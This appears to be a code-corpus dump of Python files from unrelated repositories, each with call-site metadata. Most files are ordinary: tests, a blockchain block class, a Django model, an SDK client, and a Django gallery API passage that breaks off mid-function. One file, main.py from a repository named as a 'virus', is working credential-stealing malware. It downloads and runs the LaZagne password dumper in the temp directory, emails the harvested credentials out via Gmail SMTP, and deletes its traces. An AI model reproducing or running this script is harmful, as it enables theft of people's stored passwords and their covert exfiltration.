[((6, 6, 6, 25), 'dash.Dash', 'dash.Dash', ({(6, 16, 6, 24): '__name__'}, {}), '(__name__)', False, 'import dash\n'), ((18, 4, 18, 49), 'dash.dependencies.Output', 'Output', ({(18, 11, 18, 36): '"""textarea-example-output"""', (18, 38, 18, 48): '"""children"""'}, {}), "('textarea-example-output', 'children')", False, 'from dash.dependencies import Input, Output\n'), ((9, 4, 13, 5), 'dash_core_components.Textarea', 'dcc.Textarea', (), '', True, 'import dash_core_components as dcc\n'), ((14, 4, 14, 76), 'dash_html_components.Div', 'html.Div', (), '', True, 'import dash_html_components as html\n'), ((19, 5, 19, 39), 'dash.dependencies.Input', 'Input', ({(19, 11, 19, 29): '"""textarea-example"""', (19, 31, 19, 38): '"""value"""'}, {}), "('textarea-example', 'value')", False, 'from dash.dependencies import Input, Output\n')]
balexander85/wrapped_driver
tests/test_wrapped_driver.py
2b5d5f13a8cbf52a3ed5fc4b21bf9ea282d3b7a1
import pytest from selenium.common.exceptions import WebDriverException from wrapped_driver import WrappedDriver def test_empty_chromedriver_path(): """Assert error is raised if no chromedriver path is used""" with pytest.raises(WebDriverException): WrappedDriver(executable_path="", headless=True) def test_no_chromedriver_path(): """Assert error is raised if no chromedriver path is used""" with pytest.raises(TypeError): WrappedDriver(headless=True)
[((9, 9, 9, 42), 'pytest.raises', 'pytest.raises', ({(9, 23, 9, 41): 'WebDriverException'}, {}), '(WebDriverException)', False, 'import pytest\n'), ((10, 8, 10, 56), 'wrapped_driver.WrappedDriver', 'WrappedDriver', (), '', False, 'from wrapped_driver import WrappedDriver\n'), ((15, 9, 15, 33), 'pytest.raises', 'pytest.raises', ({(15, 23, 15, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((16, 8, 16, 36), 'wrapped_driver.WrappedDriver', 'WrappedDriver', (), '', False, 'from wrapped_driver import WrappedDriver\n')]
ggs134/py-evm
eth/vm/forks/petersburg/blocks.py
5ad87356181b03c14a2452131f50fe8762127c84
from rlp.sedes import ( CountableList, ) from eth.rlp.headers import ( BlockHeader, ) from eth.vm.forks.byzantium.blocks import ( ByzantiumBlock, ) from .transactions import ( PetersburgTransaction, ) class PetersburgBlock(ByzantiumBlock): transaction_builder = PetersburgTransaction fields = [ ('header', BlockHeader), ('transactions', CountableList(transaction_builder)), ('uncles', CountableList(BlockHeader)) ]
[((20, 25, 20, 59), 'rlp.sedes.CountableList', 'CountableList', ({(20, 39, 20, 58): 'transaction_builder'}, {}), '(transaction_builder)', False, 'from rlp.sedes import CountableList\n'), ((21, 19, 21, 45), 'rlp.sedes.CountableList', 'CountableList', ({(21, 33, 21, 44): 'BlockHeader'}, {}), '(BlockHeader)', False, 'from rlp.sedes import CountableList\n')]
crnbaker/MONAI
tests/runner.py
a4b1144efdc27b197410033ae08bd587c8a1634a
# Copyright 2020 MONAI Consortium # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import inspect import os import sys import time import unittest from monai.utils import PerfContext results: dict = dict() class TimeLoggingTestResult(unittest.TextTestResult): """Overload the default results so that we can store the results.""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.timed_tests = dict() def startTest(self, test): # noqa: N802 """Start timer, print test name, do normal test.""" self.start_time = time.time() name = self.getDescription(test) self.stream.write(f"Starting test: {name}...\n") super().startTest(test) def stopTest(self, test): # noqa: N802 """On test end, get time, print, store and do normal behaviour.""" elapsed = time.time() - self.start_time name = self.getDescription(test) self.stream.write(f"Finished test: {name} ({elapsed:.03}s)\n") if name in results: raise AssertionError("expected all keys to be unique") results[name] = elapsed super().stopTest(test) def print_results(results, discovery_time, thresh, status): # only keep results >= threshold results = dict(filter(lambda x: x[1] > thresh, results.items())) if len(results) == 0: return print(f"\n\n{status}, printing completed times >{thresh}s in ascending order...\n") timings = dict(sorted(results.items(), key=lambda item: item[1])) for r in timings: if timings[r] >= thresh: print(f"{r} ({timings[r]:.03}s)") print(f"test discovery time: {discovery_time:.03}s") print(f"total testing time: {sum(results.values()):.03}s") print("Remember to check above times for any errors!") def parse_args(default_pattern): parser = argparse.ArgumentParser(description="Runner for MONAI unittests with timing.") parser.add_argument( "-s", action="store", dest="path", default=".", help="Directory to start discovery (default: '%(default)s')" ) parser.add_argument( "-p", action="store", dest="pattern", default=default_pattern, help="Pattern to match tests (default: '%(default)s')", ) parser.add_argument( "-t", "--thresh", dest="thresh", default=10.0, type=float, help="Display tests longer than given threshold (default: %(default)d)", ) parser.add_argument( "-v", "--verbosity", action="store", dest="verbosity", type=int, default=1, help="Verbosity level (default: %(default)d)", ) parser.add_argument("-q", "--quick", action="store_true", dest="quick", default=False, help="Only do quick tests") parser.add_argument( "-f", "--failfast", action="store_true", dest="failfast", default=False, help="Stop testing on first failure" ) args = parser.parse_args() print(f"Running tests in folder: '{args.path}'") if args.pattern: print(f"With file pattern: '{args.pattern}'") return args def get_default_pattern(loader): signature = inspect.signature(loader.discover) params = {k: v.default for k, v in signature.parameters.items() if v.default is not inspect.Parameter.empty} return params["pattern"] if __name__ == "__main__": loader = unittest.TestLoader() default_pattern = get_default_pattern(loader) # Parse input arguments args = parse_args(default_pattern) # If quick is desired, set environment variable if args.quick: os.environ["QUICKTEST"] = "True" # Get all test names (optionally from some path with some pattern) with PerfContext() as pc: tests = loader.discover(args.path, args.pattern) discovery_time = pc.total_time print(f"time to discover tests: {discovery_time}s") test_runner = unittest.runner.TextTestRunner( resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast ) # Use try catches to print the current results if encountering exception or keyboard interruption try: test_result = test_runner.run(tests) print_results(results, discovery_time, args.thresh, "tests finished") sys.exit(not test_result.wasSuccessful()) except KeyboardInterrupt: print_results(results, discovery_time, args.thresh, "tests cancelled") sys.exit(1) except Exception: print_results(results, discovery_time, args.thresh, "exception reached") raise
[((66, 13, 66, 91), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((107, 16, 107, 50), 'inspect.signature', 'inspect.signature', ({(107, 34, 107, 49): 'loader.discover'}, {}), '(loader.discover)', False, 'import inspect\n'), ((114, 13, 114, 34), 'unittest.TestLoader', 'unittest.TestLoader', ({}, {}), '()', False, 'import unittest\n'), ((130, 18, 132, 5), 'unittest.runner.TextTestRunner', 'unittest.runner.TextTestRunner', (), '', False, 'import unittest\n'), ((33, 26, 33, 37), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((125, 9, 125, 22), 'monai.utils.PerfContext', 'PerfContext', ({}, {}), '()', False, 'from monai.utils import PerfContext\n'), ((40, 18, 40, 29), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((141, 8, 141, 19), 'sys.exit', 'sys.exit', ({(141, 17, 141, 18): '(1)'}, {}), '(1)', False, 'import sys\n')]
arnoyu-hub/COMP0016miemie
venv/Lib/site-packages/pandas/core/array_algos/transforms.py
59af664dcf190eab4f93cefb8471908717415fea
""" transforms.py is for shape-preserving functions. """ import numpy as np def shift(values: np.ndarray, periods: int, axis: int, fill_value) -> np.ndarray: new_values = values if periods == 0 or values.size == 0: return new_values.copy() # make sure array sent to np.roll is c_contiguous f_ordered = values.flags.f_contiguous if f_ordered: new_values = new_values.T axis = new_values.ndim - axis - 1 if new_values.size: new_values = np.roll( new_values, np.intp(periods), axis=axis, ) axis_indexer = [slice(None)] * values.ndim if periods > 0: axis_indexer[axis] = slice(None, periods) else: axis_indexer[axis] = slice(periods, None) new_values[tuple(axis_indexer)] = fill_value # restore original order if f_ordered: new_values = new_values.T return new_values
[((23, 12, 23, 28), 'numpy.intp', 'np.intp', ({(23, 20, 23, 27): 'periods'}, {}), '(periods)', True, 'import numpy as np\n')]
Stanislav-Rybonka/studentsdb
students/models/group.py
efb1440db4ec640868342a5f74cd48784268781f
from __future__ import unicode_literals from django.db import models from django.utils.translation import ugettext as _ class Group(models.Model): """ Group model """ title = models.CharField(max_length=256, blank=False, verbose_name=_('Name')) leader = models.OneToOneField( 'Student', verbose_name=_('Leader'), blank=True, null=True, on_delete=models.SET_NULL) notes = models.TextField(blank=True, verbose_name=_('Additional notices')) class Meta(object): verbose_name = _('Group') verbose_name_plural = _('Groups') def __str__(self): if self.leader: return '{} ({} {})'.format( self.title, self.leader.first_name, self.leader.last_name) else: return '{}'.format(None)
[((18, 23, 18, 33), 'django.utils.translation.ugettext', '_', ({(18, 25, 18, 32): '"""Group"""'}, {}), "('Group')", True, 'from django.utils.translation import ugettext as _\n'), ((19, 30, 19, 41), 'django.utils.translation.ugettext', '_', ({(19, 32, 19, 40): '"""Groups"""'}, {}), "('Groups')", True, 'from django.utils.translation import ugettext as _\n'), ((12, 71, 12, 80), 'django.utils.translation.ugettext', '_', ({(12, 73, 12, 79): '"""Name"""'}, {}), "('Name')", True, 'from django.utils.translation import ugettext as _\n'), ((14, 32, 14, 43), 'django.utils.translation.ugettext', '_', ({(14, 34, 14, 42): '"""Leader"""'}, {}), "('Leader')", True, 'from django.utils.translation import ugettext as _\n'), ((15, 54, 15, 77), 'django.utils.translation.ugettext', '_', ({(15, 56, 15, 76): '"""Additional notices"""'}, {}), "('Additional notices')", True, 'from django.utils.translation import ugettext as _\n')]
pinikeizman/python-sdk
frontegg/baseConfig/identity_mixin.py
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
from abc import ABCMeta, abstractmethod from frontegg.helpers.frontegg_urls import frontegg_urls import typing import jwt import requests from frontegg.helpers.logger import logger from jwt import InvalidTokenError class IdentityClientMixin(metaclass=ABCMeta): __publicKey = None @property @abstractmethod def vendor_session_request(self) -> requests.Session: pass @property @abstractmethod def should_refresh_vendor_token(self) -> bool: pass @abstractmethod def refresh_vendor_token(self) -> None: pass def get_public_key(self) -> str: if self.__publicKey: return self.__publicKey logger.info('could not find public key locally, will fetch public key') reties = 0 while reties < 10: try: self.__publicKey = self.fetch_public_key() return self.__publicKey except Exception as e: reties = reties + 1 logger.error( 'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e)) logger.error('failed to get public key in all retries') def fetch_public_key(self) -> str: if self.should_refresh_vendor_token: self.refresh_vendor_token() response = self.vendor_session_request.get( frontegg_urls.identity_service['vendor_config']) response.raise_for_status() data = response.json() return data.get('publicKey') def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True): if not authorization_header: raise InvalidTokenError('Authorization headers is missing') logger.debug('found authorization header: ' + str(authorization_header)) jwt_token = authorization_header.replace('Bearer ', '') if verify: public_key = self.get_public_key() logger.debug('got public key' + str(public_key)) decoded = jwt.decode(jwt_token, public_key, algorithms='RS256') else: decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False) logger.info('jwt was decoded successfully') logger.debug('JWT value - ' + str(decoded)) return decoded
[((31, 8, 31, 79), 'frontegg.helpers.logger.logger.info', 'logger.info', ({(31, 20, 31, 78): '"""could not find public key locally, will fetch public key"""'}, {}), "('could not find public key locally, will fetch public key')", False, 'from frontegg.helpers.logger import logger\n'), ((42, 8, 42, 63), 'frontegg.helpers.logger.logger.error', 'logger.error', ({(42, 21, 42, 62): '"""failed to get public key in all retries"""'}, {}), "('failed to get public key in all retries')", False, 'from frontegg.helpers.logger import logger\n'), ((68, 8, 68, 51), 'frontegg.helpers.logger.logger.info', 'logger.info', ({(68, 20, 68, 50): '"""jwt was decoded successfully"""'}, {}), "('jwt was decoded successfully')", False, 'from frontegg.helpers.logger import logger\n'), ((57, 18, 57, 71), 'jwt.InvalidTokenError', 'InvalidTokenError', ({(57, 36, 57, 70): '"""Authorization headers is missing"""'}, {}), "('Authorization headers is missing')", False, 'from jwt import InvalidTokenError\n'), ((64, 22, 64, 75), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n'), ((66, 22, 66, 77), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n')]
ianlee4/splunk-cloud-sdk-python
splunk_sdk/action/v1beta2/gen_action_service_api.py
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
# coding: utf-8 # Copyright © 2021 Splunk, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"): you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # [http://www.apache.org/licenses/LICENSE-2.0] # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. ############# This file is auto-generated. Do not edit! ############# """ SDC Service: Action Service With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions. OpenAPI spec version: v1beta2.12 (recommended default) Generated by: https://openapi-generator.tech """ from requests import Response from string import Template from typing import List, Dict from splunk_sdk.base_client import handle_response from splunk_sdk.base_service import BaseService from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel from splunk_sdk.action.v1beta2.gen_models import Action from splunk_sdk.action.v1beta2.gen_models import ActionMutable from splunk_sdk.action.v1beta2.gen_models import ActionResult from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey from splunk_sdk.action.v1beta2.gen_models import ServiceError from splunk_sdk.action.v1beta2.gen_models import TriggerEvent class ActionService(BaseService): """ Action Service Version: v1beta2.12 With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions. """ def __init__(self, base_client): super().__init__(base_client) def create_action(self, action: Action, query_params: Dict[str, object] = None) -> Action: """ Creates an action template. """ if query_params is None: query_params = {} path_params = { } path = Template("/action/v1beta2/actions").substitute(path_params) url = self.base_client.build_url(path) data = action.to_dict() response = self.base_client.post(url, json=data, params=query_params) return handle_response(response, Action) def delete_action(self, action_name: str, query_params: Dict[str, object] = None) -> SSCVoidModel: """ Removes an action template. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.delete(url, params=query_params) return handle_response(response, ) def get_action(self, action_name: str, query_params: Dict[str, object] = None) -> Action: """ Returns a specific action template. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, Action) def get_action_status(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> ActionResult: """ Returns the status of an action that was invoked. The status is available for 4 days after the last status change. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, "status_id": status_id, } path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, ActionResult) def get_action_status_details(self, action_name: str, status_id: str, query_params: Dict[str, object] = None) -> List[ActionResultEmailDetail]: """ Returns the status details of the invoked email action. The status is available for 4 days after the last status change. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, "status_id": status_id, } path = Template("/action/v1beta2/actions/${action_name}/status/${status_id}/details").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, ActionResultEmailDetail) def get_public_webhook_keys(self, query_params: Dict[str, object] = None) -> List[PublicWebhookKey]: """ Returns an array of one or two webhook keys. The first key is active. The second key, if present, is expired. """ if query_params is None: query_params = {} path_params = { } path = Template("/system/action/v1beta2/webhook/keys").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, PublicWebhookKey) def list_actions(self, query_params: Dict[str, object] = None) -> List[Action]: """ Returns the list of action templates. """ if query_params is None: query_params = {} path_params = { } path = Template("/action/v1beta2/actions").substitute(path_params) url = self.base_client.build_url(path) response = self.base_client.get(url, params=query_params) return handle_response(response, Action) def trigger_action(self, action_name: str, trigger_event: TriggerEvent, query_params: Dict[str, object] = None) -> SSCVoidModel: """ Invokes an action. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) data = trigger_event.to_dict() response = self.base_client.post(url, json=data, params=query_params) return handle_response(response, ) def update_action(self, action_name: str, action_mutable: ActionMutable, query_params: Dict[str, object] = None) -> Action: """ Modifies an action template. """ if query_params is None: query_params = {} path_params = { "action_name": action_name, } path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params) url = self.base_client.build_url(path) data = action_mutable.to_dict() response = self.base_client.patch(url, json=data, params=query_params) return handle_response(response, Action)
[((70, 15, 70, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(70, 31, 70, 39): 'response', (70, 41, 70, 47): 'Action'}, {}), '(response, Action)', False, 'from splunk_sdk.base_client import handle_response\n'), ((86, 15, 86, 42), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(86, 31, 86, 39): 'response'}, {}), '(response)', False, 'from splunk_sdk.base_client import handle_response\n'), ((102, 15, 102, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(102, 31, 102, 39): 'response', (102, 41, 102, 47): 'Action'}, {}), '(response, Action)', False, 'from splunk_sdk.base_client import handle_response\n'), ((119, 15, 119, 54), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(119, 31, 119, 39): 'response', (119, 41, 119, 53): 'ActionResult'}, {}), '(response, ActionResult)', False, 'from splunk_sdk.base_client import handle_response\n'), ((136, 15, 136, 65), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(136, 31, 136, 39): 'response', (136, 41, 136, 64): 'ActionResultEmailDetail'}, {}), '(response, ActionResultEmailDetail)', False, 'from splunk_sdk.base_client import handle_response\n'), ((151, 15, 151, 58), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(151, 31, 151, 39): 'response', (151, 41, 151, 57): 'PublicWebhookKey'}, {}), '(response, PublicWebhookKey)', False, 'from splunk_sdk.base_client import handle_response\n'), ((166, 15, 166, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(166, 31, 166, 39): 'response', (166, 41, 166, 47): 'Action'}, {}), '(response, Action)', False, 'from splunk_sdk.base_client import handle_response\n'), ((183, 15, 183, 42), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(183, 31, 183, 39): 'response'}, {}), '(response)', False, 'from splunk_sdk.base_client import handle_response\n'), ((200, 15, 200, 48), 'splunk_sdk.base_client.handle_response', 'handle_response', ({(200, 31, 200, 39): 'response', (200, 41, 200, 47): 'Action'}, {}), '(response, Action)', False, 'from splunk_sdk.base_client import handle_response\n'), ((66, 15, 66, 50), 'string.Template', 'Template', ({(66, 24, 66, 49): '"""/action/v1beta2/actions"""'}, {}), "('/action/v1beta2/actions')", False, 'from string import Template\n'), ((83, 15, 83, 65), 'string.Template', 'Template', ({(83, 24, 83, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n'), ((99, 15, 99, 65), 'string.Template', 'Template', ({(99, 24, 99, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n'), ((116, 15, 116, 85), 'string.Template', 'Template', ({(116, 24, 116, 84): '"""/action/v1beta2/actions/${action_name}/status/${status_id}"""'}, {}), "('/action/v1beta2/actions/${action_name}/status/${status_id}')", False, 'from string import Template\n'), ((133, 15, 133, 93), 'string.Template', 'Template', ({(133, 24, 133, 92): '"""/action/v1beta2/actions/${action_name}/status/${status_id}/details"""'}, {}), "('/action/v1beta2/actions/${action_name}/status/${status_id}/details')", False, 'from string import Template\n'), ((148, 15, 148, 62), 'string.Template', 'Template', ({(148, 24, 148, 61): '"""/system/action/v1beta2/webhook/keys"""'}, {}), "('/system/action/v1beta2/webhook/keys')", False, 'from string import Template\n'), ((163, 15, 163, 50), 'string.Template', 'Template', ({(163, 24, 163, 49): '"""/action/v1beta2/actions"""'}, {}), "('/action/v1beta2/actions')", False, 'from string import Template\n'), ((179, 15, 179, 65), 'string.Template', 'Template', ({(179, 24, 179, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n'), ((196, 15, 196, 65), 'string.Template', 'Template', ({(196, 24, 196, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n')]
zgoda/brewlog
src/brewlog/home/__init__.py
13a930b328f81d01a2be9aca07d3b14703b80faa
from flask import Blueprint home_bp = Blueprint('home', __name__) from . import views # noqa
[((4, 10, 4, 37), 'flask.Blueprint', 'Blueprint', ({(4, 20, 4, 26): '"""home"""', (4, 28, 4, 36): '__name__'}, {}), "('home', __name__)", False, 'from flask import Blueprint\n')]
TheRavehorn/DownloadExecuteReport-Virus
main.py
9df26706e504d1df33e07c09fa56baa28d89f435
#!/usr/bin/env python3 import requests import subprocess import smtplib import re import os import tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as f: f.write(get_response.content) def send_mail(email, password, message): server = smtplib.SMTP_SSL("smtp.gmail.com", "465") server.ehlo() server.login(email, password) server.sendmail(email, email, message) server.quit() temp_dir = tempfile.gettempdir() os.chdir(temp_dir) download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne result = subprocess.check_output("lazagne.exe all", shell=True) send_mail("[email protected]", "yourpassword", result) os.remove("lazagne.exe")
[((25, 11, 25, 32), 'tempfile.gettempdir', 'tempfile.gettempdir', ({}, {}), '()', False, 'import tempfile\n'), ((26, 0, 26, 18), 'os.chdir', 'os.chdir', ({(26, 9, 26, 17): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((29, 9, 29, 63), 'subprocess.check_output', 'subprocess.check_output', (), '', False, 'import subprocess\n'), ((31, 0, 31, 24), 'os.remove', 'os.remove', ({(31, 10, 31, 23): '"""lazagne.exe"""'}, {}), "('lazagne.exe')", False, 'import os\n'), ((11, 19, 11, 36), 'requests.get', 'requests.get', ({(11, 32, 11, 35): 'url'}, {}), '(url)', False, 'import requests\n'), ((18, 13, 18, 54), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', ({(18, 30, 18, 46): '"""smtp.gmail.com"""', (18, 48, 18, 53): '"""465"""'}, {}), "('smtp.gmail.com', '465')", False, 'import smtplib\n')]
Kreastr/SmartAPI-HEILA
SmartAPI/rdf/LinkedList.py
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
from SmartAPI.rdf.List import List class LinkedList(List): def __init__(self): List.__init__(self)
[((6, 8, 6, 27), 'SmartAPI.rdf.List.List.__init__', 'List.__init__', ({(6, 22, 6, 26): 'self'}, {}), '(self)', False, 'from SmartAPI.rdf.List import List\n')]
dreamhaven/Frog
frog/views/gallery.py
66e50610d5059aa371e0a50b65ceddd4813b2bc1
################################################################################################## # Copyright (c) 2012 Brett Dixon # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the # Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ################################################################################################## """ Gallery API :: GET / Lists the galleries currently visible by the current user POST / Creates a gallery object GET /id Gallery object if visible by the current user PUT /id Adds image or video objects to the gallery DELETE /id Removes image or video objects from the gallery GET /filter Returns a filtered list of image and video objects """ import time import functools import logging import requests from django.core.mail import mail_managers from django.http import JsonResponse from django.core.exceptions import ImproperlyConfigured, PermissionDenied from django.db.models import Q, Count from django.db import connection from django.db.utils import ProgrammingError from django.template.loader import render_to_string from django.views.decorators.http import require_POST from django.contrib.contenttypes.models import ContentType from django.contrib.auth.decorators import login_required from django.conf import settings import six import json try: from haystack.query import SearchQuerySet HAYSTACK = True except (ImportError, ImproperlyConfigured): HAYSTACK = False from frog.models import ( Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece, ) from frog.common import Result, getObjectsFromGuids, getClientIP LOGGER = logging.getLogger("frog") try: QUERY_MODELS = [ _ for _ in ContentType.objects.filter(app_label="frog") if issubclass(_.model_class(), Piece) ] except ProgrammingError: pass BATCH_LENGTH = 75 def index(request, obj_id=None): """Handles a request based on method and calls the appropriate function""" if request.method == "GET": return get(request, obj_id) elif request.method == "POST": return post(request) elif request.method == "PUT": return put(request, obj_id) elif request.method == "DELETE": return delete(request, obj_id) def get(request, obj_id=None): if obj_id: obj = Gallery.objects.get(pk=obj_id) if obj.security != Gallery.PUBLIC and request.user.is_anonymous: raise PermissionDenied else: res = Result() personal = [] clearance = Gallery.PUBLIC if request.user.is_authenticated: personal = Gallery.objects.filter( security=Gallery.PERSONAL, owner=request.user ) try: clearance = request.user.frog_prefs.first().clearance except AttributeError: clearance = Gallery.PUBLIC # Staff members should see everything if request.user.is_staff: clearance = Gallery.GUARDED objects = Gallery.objects.filter(security__lte=clearance) ids = [] for gallery in objects: if gallery.security == Gallery.PERSONAL: continue if gallery.id in ids: continue ids.append(gallery.id) res.append(gallery.json()) for gallery in personal: res.append(gallery.json()) return JsonResponse(res.asDict()) @login_required def post(request): """ Create a Gallery """ defaultname = "New Gallery %i" % Gallery.objects.all().count() data = json.loads(request.body)["body"] title = data.get("title", defaultname) description = data.get("description", "") security = int( data.get("security", request.user.frog_prefs.first().clearance) ) g, created = Gallery.objects.get_or_create(title=title) g.security = security g.description = description g.owner = request.user g.save() res = Result() res.append(g.json()) res.message = "Gallery created" if created else "" return JsonResponse(res.asDict()) @login_required def put(request, obj_id=None): """ Adds Image and Video objects to Gallery based on GUIDs """ data = json.loads(request.body)["body"] guids = data.get("guids", "").split(",") move = data.get("from") security = data.get("security") gallery = Gallery.objects.get(pk=obj_id) # Set the security first so subsequent securityChecks will get the correct security level if security is not None: gallery.security = json.loads(security) gallery.save() for child in gallery.gallery_set.all(): child.security = gallery.security child.save() if guids: items = getObjectsFromGuids(guids) gallery.addItems(items) if move: fromgallery = Gallery.objects.get(pk=move) fromgallery.removeItems(items) res = Result() res.append(gallery.json()) return JsonResponse(res.asDict()) @login_required def delete(request, obj_id=None): """ Removes ImageVideo objects from Gallery """ data = json.loads(request.body) guids = data.get("guids").split(",") items = getObjectsFromGuids(guids) gallery = Gallery.objects.get(pk=obj_id) LOGGER.info( "{} removed {} from {}".format(request.user.email, guids, gallery) ) gallery.removeItems(items) res = Result() return JsonResponse(res.asDict()) @login_required def filterObjects(request, obj_id): """ Filters Gallery for the requested ImageVideo objects. Returns a Result object with serialized objects """ if int(obj_id) == 0: obj = None else: obj = Gallery.objects.get(pk=obj_id) isanonymous = request.user.is_anonymous if isanonymous and obj is None: LOGGER.warning( "There was an anonymous access attempt from {} to {}".format( getClientIP(request), obj ) ) raise PermissionDenied() if isanonymous and obj and obj.security != Gallery.PUBLIC: LOGGER.warning( "There was an anonymous access attempt from {} to {}".format( getClientIP(request), obj ) ) raise PermissionDenied() if obj and obj.security != Gallery.PERSONAL: if request.user.frog_prefs.first().clearance < obj.security: raise PermissionDenied() tags = json.loads(request.GET.get("filters", "[[]]")) more = json.loads(request.GET.get("more", "false")) orderby = request.GET.get( "orderby", request.user.frog_prefs.get().json()["orderby"] ) tags = [t for t in tags if t] return _filter(request, obj, tags=tags, more=more, orderby=orderby) def _filter(request, object_, tags=None, more=False, orderby="created"): """Filters Piece objects from self based on filters, search, and range :param tags: List of tag IDs to filter :type tags: list :param more -- bool, Returns more of the same filtered set of images based on session range return list, Objects filtered """ res = Result() idDict = {} objDict = {} data = {} modelmap = {} # Get all IDs for each model for m in QUERY_MODELS: modelmap[m.model_class()] = m.model if object_: idDict[m.model] = m.model_class().objects.filter(gallery=object_) else: idDict[m.model] = m.model_class().objects.all() if idDict[m.model] is None: continue if tags: for bucket in tags: searchQuery = "" o = None for item in bucket: if item == 0: # filter by tagless idDict[m.model].annotate(num_tags=Count("tags")) if not o: o = Q() o |= Q(num_tags__lte=1) break elif isinstance(item, six.integer_types): # filter by tag if not o: o = Q() o |= Q(tags__id=item) else: # add to search string searchQuery += item + " " if not HAYSTACK: if not o: o = Q() # use a basic search o |= Q(title__icontains=item) if HAYSTACK and searchQuery != "": # once all tags have been filtered, filter by search searchIDs = search(searchQuery, m.model_class()) if searchIDs: if not o: o = Q() o |= Q(id__in=searchIDs) if o: # apply the filters idDict[m.model] = ( idDict[m.model] .annotate(num_tags=Count("tags")) .filter(o) ) else: idDict[m.model] = idDict[m.model].none() # Remove hidden items before slicing so we get an accurate count idDict[m.model] = idDict[m.model].exclude(hidden=True) # Remove deleted items before slicing so we get an accurate count idDict[m.model] = idDict[m.model].exclude(deleted=True) # Get all ids of filtered objects, this will be a very fast query idDict[m.model] = list( idDict[m.model] .order_by("-{}".format(orderby)) .values_list("id", flat=True) ) lastid = request.session.get("last_{}".format(m.model), 0) if not idDict[m.model]: continue if not more: lastid = 